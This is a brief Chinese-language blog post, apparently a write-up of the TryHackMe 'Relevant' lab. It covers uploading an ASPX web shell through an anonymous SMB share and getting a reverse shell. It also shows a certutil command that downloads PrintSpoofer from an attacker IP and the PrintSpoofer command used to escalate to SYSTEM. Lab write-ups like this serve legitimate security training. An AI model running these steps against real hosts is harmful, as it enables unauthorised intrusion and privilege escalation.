THM-OP-Relevant

Mkd1R 2022-5-31 92 5/31
端口扫描发现80,49663都是http,smb存在匿名访问,可以在49663端口拼接smb共享的目录(目录扫描),然后利用匿名smb上传aspx马,进行反弹一个低权shell
拿到低权使用whoami /priv查看当前用户在系统中的权限
存在MS Windows SeImpersonatePrivilege权限提升漏洞,可以利用令牌模拟来提权,下载PrintSpoofer64
(https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0)
利用smb匿名共享上传或者本地开http在靶机发下载(certutil -urlcache -f http://10.10.2.56/PrintSpoofer.exe PrintSpoofer.exe)
PrintSpoofer64.exe -i -c cmd

-i:进行交互
-c:我们要执行的命令
- THE END -

Mkd1R

7月02日21:52

最后修改:2022年7月2日
0

非特殊说明,本博所有文章均为博主原创。